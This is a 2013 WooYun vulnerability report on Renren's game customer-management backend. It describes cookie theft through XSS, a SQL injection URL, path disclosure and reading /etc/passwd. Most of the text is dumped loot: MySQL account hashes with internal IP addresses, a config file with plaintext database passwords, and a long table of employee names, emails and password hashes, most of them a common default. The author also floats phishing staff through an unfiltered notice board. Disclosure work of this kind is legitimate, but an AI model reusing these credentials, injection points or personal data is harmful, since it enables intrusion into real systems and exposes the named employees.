当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018510

漏洞标题:人人网游戏XSS+SQL注入+爆路径+列目录,员工信息大量泄漏

相关厂商:人人网

漏洞作者: whirlwind

提交时间:2013-02-07 22:29

修复时间:2013-03-24 22:30

公开时间:2013-03-24 22:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-02-07: 细节已通知厂商并且等待厂商处理中
2013-02-11: 厂商已经确认,细节仅向厂商公开
2013-02-21: 细节向核心白帽子及相关领域专家公开
2013-03-03: 细节向普通白帽子公开
2013-03-13: 细节向实习白帽子公开
2013-03-24: 细节向公众公开

简要描述:

XSS偷取cookies,还有注入,权限蛮大的哦,能直接load_file('/etc/passwd')
目测拿下wan.renren.com

详细说明:

http://wan.renren.com/service.shtml
首先这里随便找了一个客服,提交时插入XSS代码,似乎名字那里,忘记了,然后cookies就来了
然后进后台,高级管理员哦
爆路径 http://rrcrm.data.io8.org/lib/
/data/web/crm.imop.com/
sql注入 http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
必须验证cookies才能注入

arget: 		http://rrcrm.data.io8.org/admin.php?module=Noticeol&action=detail&nid=37
Host IP:		60.29.248.160
Powered-by: 	PHP/5.2.5
Web Server: 	lighttpd/1.4.13
DB Server: 	MySQL >=5
Resp. Time(avg):	149 ms
Current User: 	root@localhost
Sql Version: 	5.1.38-community-log
Current DB: 	CRM
System User: 	root@localhost
Host Name: 	TJHY248-160.opi.com
Installation dir: 	/
DB User & Pass: 	root:053a9bf72434f7f8:localhost
		root:*84FC659A33D523EACAFFDD441B0D3FB5A114E791:TJHY248-160.opi.com
		xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.227.25
		msgweb:32ce979f1810450d:%
		gamesum:*04ED80791E1E83935FCFB04DB251B8923CA52276:10%
		stat:532a371916879d65:%
		gc_imop:*543E075F9BD62E4B2C39F12CD7BDDAA75A6E8A40:10.22.225.%
		webcrm:63e483b832b5e91a:%
		xiaonei_ts:38e845946c9b5163:10.22.225.110
		crm_zl:0e1493ed782f704c:10.4.130.79
		ssgc:*A0BBFCF8936A3F109DC2CBB177EB06FF98E7C18D:10.22.225.238
		replication:565491d704013245:10.22.225.20
		xiaonei_dg:*46FD43B2B28A764BFACC4BDC8321E79FFC80EB04:10.22.225.105
		kaixin_ts:*0AC48CFDD7C65E4137893E7D2CA9CEFA95130238:10.22.225.116
		crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.3.32.11
		webcrm:*5A7EAE355A763D62D1B53ED34463A18E2EFC3837:10.22.225.28
		kaixin_sg:*4F9D6AA51C3DDCEF52A115B296A6BFC49F397541:10.22.227.25
		daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.6.57.60
		daniel:*E1629DD09C5A72F8836A8503F560779404DCDCF3:10.30.33.56
		replication:565491d704013245:10.30.32.141
		renren_hh:*43AED5659370B63BA30CE41A5EE8D31FBB7A0A36:10.30.34.34
		crmsum:*07917BFF5284F50A2D7399560A0110F100CBB23C:10.22.225.29
		crm_zl:*3596AFE5BEFF2D668867FF3FCBDBF52B24350868:10.30.37.160
		lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.89
		lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.22.225.90
		lockuser:*FE990CACE7B4E631AB17C9220350DB29709EF42A:10.30.33.80
		renren_sz:09d725012d72e6ab:10.30.37.22
		renren_lzr:09d725012d72e6ab:10.22.227.110
		replication:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.%
		wangkun:27df606e7932e98c:%
		zhenyu.shang:658d4f1d5d32391d:10.%
		kettle:565491d704013245:%
Data Bases: 	information_schema
		CRM
		CRMUSER
		binlogs
		mysql
		test
		testcrm
		tongyongcrm
		user_classfy


下来找找passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
zabbix:x:500:500:Zabbix User:/home/zabbix:/bin/false
mysql:x:100:103:MySQL server:/var/lib/mysql:/bin/bash


然后是mysql等数据库配置
/data/web/crm.imop.com/config.inc.php

<?php
/**
 * 设置数据库连接参数
 */
$cfg['sqlserv'] = 'localhost';
$cfg['sqluser'] = 'root';
$cfg['sqlpass'] = 'crm123li';
$cfg['sqllibr'] = 'CRM';
/**
 * 页面TITLE
 */
$cfg['title'] = 'CRM管理系统2011';
/**
 * 设置模板路径
 */
$cfg['template'] = 'templates';
$cfg['template_c'] = 'templates_c';
$color = array("black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44","black" , "blue" , "red" , "green" , "#999933" , "#4CD2D2" , "#FC9B39" , "#4B7994" , "#8300CA" , "#009C9C" , "#B24194" , "yellow" , "#11cccc" , "#77dd22" , "#444444", "#154544" , "#dd00CA" , "#cc9C9C" , "#aa4194" , "#bbcc33" , "#77aacc" , "#dd44dd" , "#211144" , "#98FF44");
define('CRM_HOST','localhost:3306');
define('CRM_USER','root');
define('CRM_PWD','crm123li');
define('CRM_DB','CRM');
define('MARKET_ALL_HOST','sg.data.io8.org:3306');
define('MARKET_ALL_USER','stat');
define('MARKET_ALL_PWD','petnewstatZL123');
define('MARKET_ALL_DB','market_all');
//define("GAME_HOST","10.30.32.126:3306");
define("GAME_HOST","10.22.222.23");
define("GAME_USER","webcrm");
define("GAME_PWD","webcrm123");
define("GAME_DB","GAMEUSER");
define("GAMEPAY_DB","GAMEPAY");//后台算数
define("MGC_HOST","10.22.225.87:3306");
define("MGC_USER","webcrm");
define("MGC_PWD","webcrm123");
define("MGC_DB","GAMEUSER");
define("SSWEB_HOST","10.22.225.61:5003");
define("SSWEB_USER","webcrm");
define("SSWEB_PWD","webcrm123");
define("SSWEB_DB","ss_web");
//define("SSGC_HOST","10.22.225.22:4001");
//define("SSGC_USER","webcrm");
//define("SSGC_PWD","webcrm123");
//define("SSGC_DB","GAMEUSER");
define("SSGC_HOST","10.22.238.140:3306");
define("SSGC_USER","webcrm");
define("SSGC_PWD","webcrm123");
define("SSGC_DB","GAMEUSER");
define("SSCRM_HOST",'localhost:3306');
define("SSCRM_USER",'webcrm');
define("SSCRM_PWD",'webcrm123');
define("SSCRM_DB",'SSCRM');
//define("SHOP_HOST","10.22.225.34:3306");
define("SHOP_HOST","10.30.36.201");
define("SHOP_USER","webcrm");
define("SHOP_PWD","webcrm123");
define("SHOP_DB","mop_shop");
//校内中心
define("XIAONEI_HOST","10.22.225.115:3306");
define("XIAONEI_USER","webcrm");
define("XIAONEI_PWD",'webcrm123');
define("XIAONEI_DB","XNTSGAMELOCALPAY");
//算数DB
define("SUM_HOST","crmdb.data.io8.org");
define("SUM_USER","webcrm");
define("SUM_PWD",'webcrm123');
define("SUM_DB","CRMUSER");
//信息服务器db
define("MSG_HOST","10.30.32.95:3306");
define("MSG_USER","webcrm");
define("MSG_PWD",'webcrm123');
define("MSG_DB","IMOPMSG");
//分页设置
define("PAGE_MAX", 20);
define("PAGE_NUM", 10);
?>


好多
顺便发现个fck
http://cms-na.tech.io8.org/fckeditor/
http://rrcrm.data.io8.org/lib/FCKeditor/
另外,进后台后可以修改公告,没有任何过滤,如果我给弄个基础认证钓鱼的话,嘿嘿,也许还能搞到点游戏号
最后说一下,我发现他游戏后台的默认密码全部是123456

漏洞证明:

QQ截图20130207215757.gif


2.gif


realname 	team 	password 	username 	id
	,46, 	e10adc3949ba59abbe56e057f20f883e 	Min.wang 	795
	,43,42,39,36,6,4, 	ca514e5d3ab30b0da3a0e0c09dfc9490 	xuelong.chen@renren-inc.com 	797
	,46, 	e10adc3949ba59abbe56e057f20f883e 	Qi.zhao1 	796
	,43,42,39,36,6,4, 	9155dde75497ba1dea7ccfa08a22ffe6 	pan.hu1@renren-inc.com 	798
	,46, 	4297f44b13955235245b2497399d7a93 	Yue.shu 	794
姜瑞华 	,4, 	e10adc3949ba59abbe56e057f20f883e 	ruihua.jiang@opi-corp.com 	674
bo.gang1 	,38, 	5f38df2425932780987944fd6e1112d1 	bo.gang1 	723
twt 	,24,4, 	2e9087b02957f5c29d14a8fd492cbeb3 	twt 	566
wjktest 	,31, 	e10adc3949ba59abbe56e057f20f883e 	wjktest 	574
白小雪 	,43,42,39,36,6,4, 	e10adc3949ba59abbe56e057f20f883e 	xiaoxue.bai@renren-inc.com 	801
白云 	,34, 	e10adc3949ba59abbe56e057f20f883e 	yun.bai@opi-corp.com 	436
蔡龙雨 	,36, 	539fc5eb51fa336790822a0751b18dfb 	longyu.cai 	601
蔡萌 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.meng.cai@opi-corp.com 	748
曹俊 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jun.cao@opi-corp.com 	608
曹蕾 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.lei.cao@opi-corp.com 	742
柴留栓 	,4, 	e10adc3949ba59abbe56e057f20f883e 	liushuan.chai@opi-corp.com 	476
常静 	,6, 	e10adc3949ba59abbe56e057f20f883e 	jing.chang@opi-corp.com 	88
车臣 	,24, 	e10adc3949ba59abbe56e057f20f883e 	chechen 	471
陈超 	,11, 	e10adc3949ba59abbe56e057f20f883e 	chenchao 	363
陈春晖 	,36, 	e10adc3949ba59abbe56e057f20f883e 	chunhui.chen@opi-corp.com 	696
陈春树 	,6, 	e10adc3949ba59abbe56e057f20f883e 	chunshu.chen@opi-corp.com 	672
陈佳丽 	,0, 	e10adc3949ba59abbe56e057f20f883e 	jiali.chen@opi-corp.com 	546
陈金磊 	,44,40,4, 	e10adc3949ba59abbe56e057f20f883e 	jinlei.chen@opi-corp.com 	832
陈亮 	,24, 	e10adc3949ba59abbe56e057f20f883e 	chenliang 	544
陈萌萌 	,11, 	e10adc3949ba59abbe56e057f20f883e 	mengmeng.chen@opi-corp.com 	724
陈鹏亮 	,41,38,37,6,4, 	e10adc3949ba59abbe56e057f20f883e 	pengliang.chen@opi-corp.com 	227
陈乾 	,36, 	e10adc3949ba59abbe56e057f20f883e 	qian.chen@opi-corp.com 	669
陈瑞杰 	,48,47,46,45,44,43,42,41,40,39,38,31,6,4, 	e10adc3949ba59abbe56e057f20f883e 	chen.ruijie@opi-corp.com 	720
陈思伦 	,, 	e10adc3949ba59abbe56e057f20f883e 	silun.chen@opi-corp.com 	551
陈曦 	,, 	e10adc3949ba59abbe56e057f20f883e 	xi-chen@opi-corp.com 	400
陈曦 	,4, 	e10adc3949ba59abbe56e057f20f883e 	xi.chen1@opi-corp.com 	673
陈向飞 	,11, 	e10adc3949ba59abbe56e057f20f883e 	xiangfei.chen@opi-corp.com 	594
陈晓菡 	,6, 	e10adc3949ba59abbe56e057f20f883e 	xiaohan.chen@opi-corp.com 	511
陈雄飞 	,11, 	e10adc3949ba59abbe56e057f20f883e 	xiongfei.chen@opi-corp.com 	656
陈云龙 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.yunlong.chen@opi-corp.com 	808
程长利 	,24, 	e10adc3949ba59abbe56e057f20f883e 	chengchangli 	775
程佳宝 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.jiabao.cheng@opi-corp.com 	784
程薇 	,11, 	e10adc3949ba59abbe56e057f20f883e 	chengwei@opi-corp.com 	408
程雯 	,24, 	e10adc3949ba59abbe56e057f20f883e 	chengwen 	395
迟洪蕊 	,11, 	e10adc3949ba59abbe56e057f20f883e 	hongrui.chi@opi-corp.com 	515
单单 	,0, 	f2748f5fedab17bcba3b8e50a77a523d 	dan.shan@opi-corp.com 	86
邓涤洁 	,24, 	e10adc3949ba59abbe56e057f20f883e 	dengdijie 	816
邓俊海 	,24, 	e10adc3949ba59abbe56e057f20f883e 	dengjunhai 	411
董亮 	,37, 	e10adc3949ba59abbe56e057f20f883e 	liang.dong@opi-corp.com 	700
董晓庆 	,11, 	e10adc3949ba59abbe56e057f20f883e 	dongxiaoqing 	403
窦东栋 	,33, 	e10adc3949ba59abbe56e057f20f883e 	dongdong.dou@opi-corp.com 	479
窦武龙 	,24, 	e10adc3949ba59abbe56e057f20f883e 	douwulong 	774
杜宏跃 	,48, 	e10adc3949ba59abbe56e057f20f883e 	hongyue.du@opi-corp.com 	789
杜薇 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wei.du@opi-corp.com 	453
杜旭 	,11, 	e10adc3949ba59abbe56e057f20f883e 	xu.du@opi-corp.com 	560
樊建栋 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jiandong.fan@opi-corp.com 	697
樊晋元 	,44,40,37,4, 	e10adc3949ba59abbe56e057f20f883e 	jinyuan.fan@opi-corp.com 	582
樊晓琦 	,48, 	e10adc3949ba59abbe56e057f20f883e 	xiaoqi.fan@opi-corp.com 	529
范光旭 	,43,42,39,11, 	e10adc3949ba59abbe56e057f20f883e 	guangxu.fan@opi-corp.com 	703
范昭 	,11, 	e10adc3949ba59abbe56e057f20f883e 	zhao.fan@opi-corp.com 	423
冯超 	,39, 	e10adc3949ba59abbe56e057f20f883e 	chao.feng1@opi-corp.com 	800
冯卫鲛 	,11, 	e10adc3949ba59abbe56e057f20f883e 	weijiao.feng@opi-corp.com 	514
冯小惠 	,44,40,4, 	e10adc3949ba59abbe56e057f20f883e 	xiaohui.feng@opi-corp.com 	833
付琦 	,45,33, 	e10adc3949ba59abbe56e057f20f883e 	qi.fu@opi-corp.com 	664
冮博 	,39,38,37,36,6,4, 	9c8459932c64783dcb2cd4b8ef51cd24 	bo.gang@opi-corp.com 	584
高峰 	,43,42,39, 	e10adc3949ba59abbe56e057f20f883e 	feng.gao3@renren-inc.com 	831
高峰 	,43,42,39, 	e10adc3949ba59abbe56e057f20f883e 	feng.gao3@opi-corp.com 	826
高璐 	,47,46, 	df10ef8509dc176d733d59549e7dbfaf 	lu.gao 	735
高润 	,, 	e10adc3949ba59abbe56e057f20f883e 	run.gao@opi-corp.com 	565
高山 	,24, 	1ab017b98e0d01a6622eeee8ca7a1702 	gaoshan 	470
高爽 	,41,38, 	e10adc3949ba59abbe56e057f20f883e 	shuang.gao@renren-inc.com 	824
宫乐 	,36,6, 	e10adc3949ba59abbe56e057f20f883e 	le.gong@opi-corp.com 	580
顾雷 	,8, 	e10adc3949ba59abbe56e057f20f883e 	lei.gu@opi-corp.com 	161
郭斌 	,24, 	e10adc3949ba59abbe56e057f20f883e 	guobin 	661
郭芳芳 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.fangfang.guo@opi-corp.com 	803
郭亮 	,11, 	e10adc3949ba59abbe56e057f20f883e 	liang.guo@opi-corp.com 	149
郭鹏 	,24, 	e10adc3949ba59abbe56e057f20f883e 	guopeng 	437
郭西征 	,41,38,37,4, 	e10adc3949ba59abbe56e057f20f883e 	xizheng.guo@opi-corp.com 	695
郭毅华 	,24,4, 	46afbc23585c5506d75699425bb07118 	guoyihua 	381
韩冬 	,11, 	e10adc3949ba59abbe56e057f20f883e 	dong.han@opi-corp.com 	648
韩涛 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.tao.han@opi-corp.com 	822
何安娜 	,0, 	9b8477af34424b3ae5d426fb6d16a48e 	heanna 	488
何瑞雪 	,36, 	e10adc3949ba59abbe56e057f20f883e 	ruixue.he@opi-corp.com 	693
何珊珊 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.shanshan.he@opi-corp.com 	699
何文 	,44,40,11, 	e10adc3949ba59abbe56e057f20f883e 	wen.he@opi-corp.com 	638
何宇轩 	,11, 	e10adc3949ba59abbe56e057f20f883e 	yuxuan.he@opi-corp.com 	660
贺鹏飞 	,11, 	e10adc3949ba59abbe56e057f20f883e 	pengfei.he@opi-corp.com 	89
赫峰 	,34, 	e10adc3949ba59abbe56e057f20f883e 	feng.he@opi-corp.com 	550
洪鼎捷 	,34, 	22fd3fa8e8637a2c22e221a733bceb52 	hongdingjie 	630
洪鼎捷 	,37, 	e10adc3949ba59abbe56e057f20f883e 	dingjie.hong@opi-corp.com 	647
洪峰 	,, 	e10adc3949ba59abbe56e057f20f883e 	feng.hong 	634
侯杰峰 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jiefeng.hou@opi-corp.com 	567
候宇 	,6, 	e10adc3949ba59abbe56e057f20f883e 	houyu 	370
胡睿琪 	,34, 	e10adc3949ba59abbe56e057f20f883e 	ruiqi.hu@opi-corp.com 	555
胡晓川 	,48, 	e10adc3949ba59abbe56e057f20f883e 	xiaochuan.hu@opi-corp.com 	791
黄丹 	,41,38,6, 	e10adc3949ba59abbe56e057f20f883e 	dan.huang@opi-corp.com 	75
黄建兴 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jianxing.huang@opi-corp.com 	657
黄珊 	,24, 	fdc1419aab1b1e4a4a80c10293d77e55 	huangshan 	384
霍子赟 	,34, 	42a1c4e4521f50cbb53292651df9e7ec 	huoziyun 	631
纪洪刚 	,4, 	e10adc3949ba59abbe56e057f20f883e 	jihonggang 	492
贾冰一 	,6, 	e10adc3949ba59abbe56e057f20f883e 	bingyi.jia@opi-corp.com 	422
贾妍 	,11, 	e10adc3949ba59abbe56e057f20f883e 	yan.jia@opi-corp.com 	558
江楠 	,43,42,39,36,6,4, 	f9925e6ee3b5ae2bbcc27808f47319f5 	nan.jiang1@renren-inc.com 	806
姜刘阳 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.liuyang.jiang@opi-corp.com 	717
姜志鹏 	,34, 	91a23961c0adfe65ab9c149f8c8ea02b 	jiangzhipeng 	632
蒋征 	,48, 	e10adc3949ba59abbe56e057f20f883e 	zheng.jiang@renren-inc.com 	759
徼红艳 	,37,11, 	e10adc3949ba59abbe56e057f20f883e 	hongyan.jiao@opi-corp.com 	559
金帆 	,48,4, 	e10adc3949ba59abbe56e057f20f883e 	fan.jin@opi-corp.com 	811
井海泉 	,24,4, 	e10adc3949ba59abbe56e057f20f883e 	jinghaiquan 	623
康旭 	,24, 	e10adc3949ba59abbe56e057f20f883e 	kangxu 	815
客服补偿 	,34,4, 	e10adc3949ba59abbe56e057f20f883e 	kfbuchang 	651
寇楹煊 	,31, 	e10adc3949ba59abbe56e057f20f883e 	yingxuan.kou@opi-corp.com 	540
李兵 	,11, 	e10adc3949ba59abbe56e057f20f883e 	bing.li@opi-corp.com 	165
李波 	,48,11,4, 	e10adc3949ba59abbe56e057f20f883e 	li-bo@opi-corp.com 	655
李畅业 	,, 	e10adc3949ba59abbe56e057f20f883e 	changye.li@opi-corp.com 	706
李超 	,24, 	21536b3e30242c7c304f55f4c40acb4f 	lichao 	541
李超国 	,6, 	e10adc3949ba59abbe56e057f20f883e 	chaoguo.li@opi-corp.com 	766
李冲 	,, 	e10adc3949ba59abbe56e057f20f883e 	chong.li@opi-corp.com 	553
李凤祥 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.fengxiang.li@opi-corp.com 	745
李慧 	,0,48,47,46,45,37,36,31,24,11,6,4, 	e10adc3949ba59abbe56e057f20f883e 	lihui@opi-corp.com 	9
李佳 	,39, 	e10adc3949ba59abbe56e057f20f883e 	jia.li1@opi-corp.com 	727
李家倩 	,11, 	e10adc3949ba59abbe56e057f20f883e 	jiaqian.li@opi-corp.com 	670
李家倩 	,4, 	e10adc3949ba59abbe56e057f20f883e 	lijiaqian 	212
李嘉轩 	,48,46,4, 	35e7d2e04afef03da02d4801b5ccea9d 	jiaxuan.li@renren-inc.com 	760
李杰 	,41,38,36,6,4, 	e10adc3949ba59abbe56e057f20f883e 	jie.li@opi-corp.com 	665
李鍇 	,0, 	e10adc3949ba59abbe56e057f20f883e 	likai 	493
李磊 	,6, 	e10adc3949ba59abbe56e057f20f883e 	lei.li@opi-corp.com 	219
李莉 	,24, 	e10adc3949ba59abbe56e057f20f883e 	lili 	387
李敏 	,0, 	e10adc3949ba59abbe56e057f20f883e 	limin@opi-corp.com 	68
李楠 	,24, 	e268443e43d93dab7ebef303bbe9642f 	linan 	385
李少平 	,24, 	f038985839d66ec5fe58db366adb896c 	lishaoping 	475
李世朋 	,11, 	e10adc3949ba59abbe56e057f20f883e 	shipeng.li@opi-corp.com 	512
李硕 	,6, 	e10adc3949ba59abbe56e057f20f883e 	shuo.li1@opi-corp.com 	663
李涛 	,45,6, 	e10adc3949ba59abbe56e057f20f883e 	tao.li@opi-corp.com 	637
李伟 	,24, 	e40f01afbb1b9ae3dd6747ced5bca532 	liwei 	526
李晓旭 	,43,42,39,11, 	e10adc3949ba59abbe56e057f20f883e 	xiaoxu.li1@opi-corp.com 	707
李雪峰 	,11, 	e10adc3949ba59abbe56e057f20f883e 	xuefeng.li1@opi-corp.com 	721
李依家 	,44,40,4, 	c33367701511b4f6020ec61ded352059 	yijia.li 	732
李勇 	,, 	e10adc3949ba59abbe56e057f20f883e 	liyong 	705
李智勇 	,24, 	e10adc3949ba59abbe56e057f20f883e 	lizhiyong 	386
林雪 	,33, 	e10adc3949ba59abbe56e057f20f883e 	xue.lin@opi-corp.com 	606
蔺京华 	,0,37,36,35,34,33,31,24,11,6,4, 	d41d8cd98f00b204e9800998ecf8427e 	jinghua.lin@opi-corp.com 	666
刘博洋 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.boyang.liu@opi-corp.com 	821
刘畅 	,4, 	e10adc3949ba59abbe56e057f20f883e 	chang.liu@opi-corp.com 	92
刘晨 	,11, 	e10adc3949ba59abbe56e057f20f883e 	chen.liu@opi-corp.com 	534
刘晨鹏 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.chenpeng.liu@opi-corp.com 	713
刘春雪 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.chunxue.liu@opi-corp.com 	820
刘桂林 	,24,4, 	e10adc3949ba59abbe56e057f20f883e 	guilin.liu@opi-corp.com 	474
刘海舰 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.haijian.liu@opi-corp.com 	807
刘晗 	,34, 	e10adc3949ba59abbe56e057f20f883e 	han.liu@opi-corp.com 	611
刘贺贺 	,11, 	e10adc3949ba59abbe56e057f20f883e 	hehe.liu@opi-corp.com 	747
刘辉 	,24, 	79258448a61b487b57f418921201b2eb 	liuhui 	380
刘珂 	,44,40,4, 	e10adc3949ba59abbe56e057f20f883e 	ke.liu@opi-corp.com 	786
刘理 	,, 	e10adc3949ba59abbe56e057f20f883e 	li.liu@opi-corp.com 	557
刘丽 	,48,4, 	e10adc3949ba59abbe56e057f20f883e 	liu.li@opi-corp.com 	763
刘亮 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.liang.liu@opi-corp.com 	752
刘璐 	,0,37, 	e10adc3949ba59abbe56e057f20f883e 	lu.liu@opi-corp.com 	503
刘璐璐 	,6, 	e10adc3949ba59abbe56e057f20f883e 	lulu.liu@opi-corp.com 	452
刘梦楠 	,44,40,4, 	e10adc3949ba59abbe56e057f20f883e 	mengnan.liu@opi-corp.com 	787
刘明东 	,11, 	e10adc3949ba59abbe56e057f20f883e 	mingdong.liu@opi-corp.com 	577
刘明辉 	,24, 	cfcd208495d565ef66e7dff9f98764da 	liuminghui 	714
刘明鑫 	,36,6, 	e10adc3949ba59abbe56e057f20f883e 	mingxin.liu@opi-corp.com 	659
刘天宇 	,24, 	e10adc3949ba59abbe56e057f20f883e 	liutianyu 	409
刘文彦 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.wenyan.liu@opi-corp.com 	750
刘鑫 	,11, 	e10adc3949ba59abbe56e057f20f883e 	xin.liu@opi-corp.com 	533
刘晏辰 	,37, 	e10adc3949ba59abbe56e057f20f883e 	yanchen.liu@opi-corp.com 	722
刘喆 	,24, 	e10adc3949ba59abbe56e057f20f883e 	liuzhe 	716
刘志伟 	,44,40,4, 	e10adc3949ba59abbe56e057f20f883e 	zhiwei.liu@opi-corp.com 	754
卢旭 	,44,40,33, 	e10adc3949ba59abbe56e057f20f883e 	xu.lu1@opi-corp.com 	644
吕浩 	,11, 	e10adc3949ba59abbe56e057f20f883e 	hao.lv@opi-corp.com 	143
吕金妍 	,31, 	e10adc3949ba59abbe56e057f20f883e 	jinyan.lv@opi-corp.com 	640
罗浩 	,37,36,6, 	d7f9534ef277733863873f357c6b0e4d 	hao.luo@opi-corp.com 	583
罗林 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.lin.luo@opi-corp.com 	739
罗世妍 	,44,40,11,4, 	e10adc3949ba59abbe56e057f20f883e 	shiyan.luo@opi-corp.com 	482
马丹丹 	,6, 	e10adc3949ba59abbe56e057f20f883e 	dandan.ma@opi-corp.com 	829
马栋永 	,47,46,45,44,43,42,41,40,39,38,35, 	e10adc3949ba59abbe56e057f20f883e 	dongyong.ma@opi-corp.com 	749
马凯宇 	,24, 	e10adc3949ba59abbe56e057f20f883e 	makaiyu 	776
马路平 	,11,4, 	e10adc3949ba59abbe56e057f20f883e 	luping.ma@opi-corp.com 	521
马美娟 	,6, 	e10adc3949ba59abbe56e057f20f883e 	wb.meijuan.ma@opi-corp.com 	823
马莹 	,24, 	e10adc3949ba59abbe56e057f20f883e 	maying 	383
马颖 	,6, 	e10adc3949ba59abbe56e057f20f883e 	ying.ma@opi-corp.com 	505
梅辰 	,6, 	d41d8cd98f00b204e9800998ecf8427e 	chen.mei@opi-corp.com 	702
孟娟 	,11, 	e10adc3949ba59abbe56e057f20f883e 	juan.meng@opi-corp.com 	463
孟睿 	,6, 	e10adc3949ba59abbe56e057f20f883e 	rui.meng@opi-corp.com 	780
穆浩然 	,47,46,45,44,43,42,41,40,39,38, 	e10adc3949ba59abbe56e057f20f883e 	haoran.mu@opi-corp.com 	744
楠洁 	,37,11, 	e10adc3949ba59abbe56e057f20f883e 	jie.nan@opi-corp.com 	522
牛祺 	,24, 	c4ca4238a0b923820dcc509a6f75849b 	niuqi 	413
钮鹏凯 	,34, 	e10adc3949ba59abbe56e057f20f883e 	pengkai.niu@opi-corp.com 	562
潘建宇 	,24, 	e10adc3949ba59abbe56e057f20f883e 	panjianyu 	715
彭蕊 	,11, 	e10adc3949ba59abbe56e057f20f883e 	rui.peng@opi-corp.com 	500
蒲岳松 	,45, 	8e8811fdc0d1947dc0ab674247db49c1 	yuesong.pu 	734
钱晨 	,11, 	e10adc3949ba59abbe56e057f20f883e 	chen.qian@opi-corp.com 	610
钱振华 	,11, 	e10adc3949ba59abbe56e057f20f883e 	zhenhua.qian@opi-corp.com 	607
邱博 	,24, 	e10adc3949ba59abbe56e057f20f883e 	qiubo 	431
曲超 	,11, 	e10adc3949ba59abbe56e057f20f883e 	chao.qu@opi-corp.com 	765
人员001 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员001 	587
人员002 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员002 	588
人员003 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员003 	612
人员004 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员004 	613
人员005 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员005 	614
人员006 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员006 	615
人员007 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员007 	616
人员008 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员008 	617
人员009 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员009 	618
人员010 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员010 	619
人员011 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员011 	620
人员012 	,36, 	e10adc3949ba59abbe56e057f20f883e 	人员012 	621
